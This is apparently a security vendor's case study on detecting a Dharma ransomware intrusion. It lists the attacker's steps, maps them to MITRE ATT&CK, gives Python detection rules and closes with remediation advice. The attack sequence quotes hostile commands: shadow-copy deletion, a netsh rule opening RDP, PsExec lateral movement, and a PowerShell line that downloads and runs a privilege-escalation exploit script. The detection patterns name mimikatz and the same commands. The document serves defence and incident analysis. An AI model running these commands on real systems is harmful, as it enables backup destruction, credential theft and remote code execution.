The Network: A well-known Managed Service Provider (MSP) specializing in infrastructure monitoring and management, disaster recovery, and security monitoring services uses Netsurion’s EventTracker to provide SOC-as-a-Service (SOCaaS) capabilities to their end clients. The affected end client is in the services industry.
The Expectation: Prevention defenses, such as anti-virus (AV) software, are working, and comprehensive monitoring and alerting is in place to rapidly detect threats that slip through the prevention layer. EventTracker Security Information and Event Management (SIEM) services, advanced endpoint protection, and behavior analytics deliver added protection for the MSP’s clients. Rapid ransomware detection is crucial, since ransomware remains costly and time-consuming to contain and remediate.
The Catch: Detection of Dharma ransomware, a variant of the CrySIS ransomware family. The EventTracker SOC (Security Operations Center) detected malicious process hashes on a host of the MSP’s client; the hashes matched Indicators of Compromise of Dharma ransomware. The attackers obtained user credentials of the client company either through a brute-force attack or by tricking the user into entering credentials on a malicious URL. The attacker logged into the system from IP address 220.127.116.11, uninstalled the AV, ran a series of malicious processes, and moved laterally over Remote Desktop Protocol (RDP). Finally, the attackers cleared audit and other system logs in an unsuccessful attempt to evade detection.
The Find: By combining SIEM and EDR technologies driven by our ISO-certified SOC, Netsurion detected many previously unseen MD5 hashes with poor reputation. The detected hashes matched hashes used to launch Dharma ransomware. Dharma has been in use since 2016, and the threat actors behind it continue to evolve and release new variants while using multiple attack vectors and decoy applications. Dharma ransomware leverages RDP on default port 3389, connecting with stolen or otherwise compromised user credentials that give the attackers access to sensitive systems and data. The cyber attackers used the tactics, techniques, and procedures (TTPs) below to infect the services-industry client with ransomware.
The EventTracker SOC observed the following attack sequence on the client host:
- Successful login to the system from blacklisted IP 18.104.22.168, originating from The Netherlands
- Installed Revo Uninstaller to remove the anti-virus program “Webroot SecureAnywhere”
- Installed a malicious .exe (IObitUnlocker.exe), for which EventTracker raised a new-software-install alert
- Downloaded a malicious file to C:\Users\<compromised Username>\Downloads\..
- Ran Advanced Port Scanner to find hosts listening on port 3389 and launch mstsc.exe (the RDP client) against them
- Deleted volume shadow copies (Windows backups) by running vssadmin delete shadows /all
- Downloaded many malicious files to C:\Users\<compromised Username>\Downloads\driver
- EventTracker SIEM with built-in EDR triggered an alert on detection of the malicious files
- Ran the credential-dumping tools “mimilove.exe” and “mimikatz.exe” to harvest passwords
- Used netsh from the command line to allow inbound RDP connections
Command line: netsh advfirewall firewall add rule name="allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow
- Attempted to log in to multiple hosts with a remote administration tool (PsExec.exe)
Command line: C:\PS\PsExec.exe \\10.0.0.55 -u <domainname>\<Username> -p <password> cmd
- Executed PowerShell to download Ikeext-Privesc from GitHub and exploit the IKE and AuthIP IPsec Keying Modules (IKEEXT) service for local privilege escalation
Command line: IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/itm4n/Ikeext-Privesc/master/Ikeext-Privesc.ps1'); Invoke-IkeextCheck -Verbose; Invoke-IkeextExploit -Verbose
- Turned the Windows Firewall off with the netsh command
- Attempted to clear audit logs from the host to remove traces of the infection and escape detection
| Tactic in MITRE ATT&CK | Technique Name in MITRE ATT&CK | Commands/Processes Matching the Tactic and Technique |
| --- | --- | --- |
| Impact | Inhibit System Recovery | vssadmin delete shadows /all. vssadmin.exe can be used to delete all volume shadow copies on a system. |
| Credential Access | Credential Dumping | mimikatz.exe & mimilove.exe. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords. |
| Defense Evasion | Disabling Security Tools | netsh. netsh can be used to disable/enable local firewall settings. |
| Execution | Service Execution | PsExec.exe. Adversaries may execute a binary, command, or script via a method that interacts with Windows services. |
| Execution | PowerShell | IEX (New-Object Net.WebClient).DownloadString(...) (full command line above). Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet, which can be used to run an executable, and the Invoke-Command cmdlet, which runs a command locally or on a remote computer. PowerShell can also be used to download and run executables from the internet, executed from disk or in memory without touching disk. |
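The following is an added example, not Netsurion or EventTracker code, showing how the attack sequence and the ATT&CK mapping above translate into detection logic. It runs rules over a handful of constructed Windows Security event records (4624 logon, 4688 process creation, 1102 audit log cleared) normalised into dicts the way a SIEM would; the field names, the allow-listed RDP source range, the sample records and the escalation threshold are all assumptions made for the example.

```python
"""Rule-based detection of the Dharma precursor chain described on this page.

Added example. Input records are constructed; field names are assumptions.
"""
import ipaddress
import re
from dataclasses import dataclass

# Assumption: RDP logons are expected only from this internal range.
ALLOWED_RDP_SOURCES = [ipaddress.ip_network("10.0.0.0/8")]

# (tactic, technique, pattern over a 4688 command line). Technique names follow
# the ATT&CK table above; both netsh uses are mapped as the page maps them.
PROCESS_RULES = [
    ("Impact", "Inhibit System Recovery",
     re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows", re.I)),
    ("Credential Access", "Credential Dumping",
     re.compile(r"\bmimi(?:katz|love)(?:\.exe)?\b", re.I)),
    ("Defense Evasion", "Disabling Security Tools",
     re.compile(r"\bnetsh\s+advfirewall\s+(?:set\s+\S+\s+state\s+off"
                r"|firewall\s+add\s+rule\b.*\blocalport=3389\b.*\baction=allow)", re.I)),
    ("Execution", "Service Execution",
     re.compile(r"\bpsexec(?:\.exe)?\s+\\\\\S+", re.I)),
    ("Execution", "PowerShell",
     re.compile(r"\bIEX\b.*DownloadString|DownloadString.*\bIEX\b", re.I)),
]


@dataclass(frozen=True)
class Finding:
    host: str
    tactic: str
    technique: str
    evidence: str


def _external_rdp_logon(ev):
    """4624 with logon type 10 (RemoteInteractive) from outside the allow-list."""
    if ev.get("event_id") != 4624 or ev.get("logon_type") != 10:
        return None
    src = ev.get("ip_address", "")
    try:
        addr = ipaddress.ip_address(src)
    except ValueError:
        return None  # malformed source field: nothing to judge
    if any(addr in net for net in ALLOWED_RDP_SOURCES):
        return None
    return Finding(ev["host"], "Initial Access", "Valid Accounts",
                   f"RDP logon for {ev.get('user')} from {src}")


def detect(events):
    """Return one Finding per event that matches a rule, in event order."""
    findings = []
    for ev in events:
        f = _external_rdp_logon(ev)
        if f:
            findings.append(f)
            continue
        if ev.get("event_id") == 4688:
            cmd = ev.get("command_line", "")
            for tactic, technique, pat in PROCESS_RULES:
                if pat.search(cmd):
                    findings.append(Finding(ev["host"], tactic, technique, cmd))
                    break
        elif ev.get("event_id") == 1102:
            findings.append(Finding(ev["host"], "Defense Evasion",
                                    "Clear Windows Event Logs",
                                    f"audit log cleared by {ev.get('user')}"))
    return findings


def escalate(findings, min_tactics=3):
    """Hosts with at least `min_tactics` distinct tactics: treat as one active
    intrusion chain rather than isolated alerts (threshold is an assumption)."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f.host, set()).add(f.tactic)
    return sorted(h for h, t in by_host.items() if len(t) >= min_tactics)


# Constructed sample records mirroring the sequence the SOC observed.
SAMPLE_EVENTS = [
    {"event_id": 4624, "host": "WS01", "logon_type": 10, "user": "jdoe",
     "ip_address": "203.0.113.10"},  # documentation range, not the page's IP
    {"event_id": 4688, "host": "WS01", "command_line": "vssadmin delete shadows /all"},
    {"event_id": 4688, "host": "WS01",
     "command_line": r"C:\Users\jdoe\Downloads\driver\mimikatz.exe"},
    {"event_id": 4688, "host": "WS01",
     "command_line": 'netsh advfirewall firewall add rule name="allow RemoteDesktop" '
                     'dir=in protocol=TCP localport=3389 action=allow'},
    {"event_id": 4688, "host": "WS01",
     "command_line": r"C:\PS\PsExec.exe \\10.0.0.55 -u corp\jdoe -p x cmd"},
    {"event_id": 4688, "host": "WS01",
     "command_line": "powershell IEX (New-Object Net.WebClient)"
                     ".DownloadString('https://example.invalid/x.ps1')"},
    {"event_id": 4688, "host": "WS01", "command_line": "netsh advfirewall set allprofiles state off"},
    {"event_id": 1102, "host": "WS01", "user": "jdoe"},
    {"event_id": 4624, "host": "WS02", "logon_type": 10, "user": "svc",
     "ip_address": "10.0.0.7"},  # internal RDP logon: no finding
    {"event_id": 4688, "host": "WS02", "command_line": "notepad.exe"},
]

if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for f in found:
        print(f"{f.host}: [{f.tactic}] {f.technique}: {f.evidence}")
    print("escalate:", escalate(found))
```

Run stand-alone, the block prints eight findings for WS01 and none for WS02, and escalates WS01 because five distinct tactics were seen on it. The escalation step is the part worth copying: each rule on its own (a shadow-copy deletion, a firewall change) has benign explanations, but several tactics on one host in sequence is the pattern that separates this intrusion from admin noise.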
The Fix: The EventTracker SOC promptly alerted the MSP upon detection. All identified malicious hashes and IP addresses were immediately moved to an unsafe list for process termination on the infected system. The collected hashes were then added to the EventTracker Threat Center repository to protect other customers and the MSP’s clients. The SOC analysts also assessed whether other devices on the network were infected. Comprehensive 24/7 monitoring quickly detected the ransomware threat. Finally, mapping the actual steps taken by the threat actor to the MITRE ATT&CK framework provides a holistic view of the risk, of the Dharma adversaries, and of how to fight these evolving threats effectively.
The Lesson: The EventTracker SOC provided remediation guidelines for the MSP to share with their end-user client. Recommendations to defend against ransomware attacks include:
- Organizations must implement strong password policies (the attackers here obtained credentials by brute force or phishing) as well as a least-privilege policy (limit access to those with a true need to know)
- RDP: limit RDP access to specific IP addresses, and turn off Remote Desktop Services if they are not needed. Moving RDP off the default port 3389 reduces only opportunistic scanning; a targeted scanner such as the one used in this attack will still find the service, so it is no substitute for restricting access
- Educate users at all levels regarding cybersecurity best practices, especially on phishing emails and social-engineering threats
- Regularly back up data, and keep backups where a compromised host cannot delete them (the attackers deleted the volume shadow copies here), so that recovery is available as a last resort
- Implement comprehensive monitoring and alerting of servers and workstations for advanced threat detection
Files observed on the host during the investigation:
- C:\Program Files\IObit\IObit Unlocker\IObitUnlocker.exe
- C:\Program Files\Process Hacker 2\kprocesshacker.sys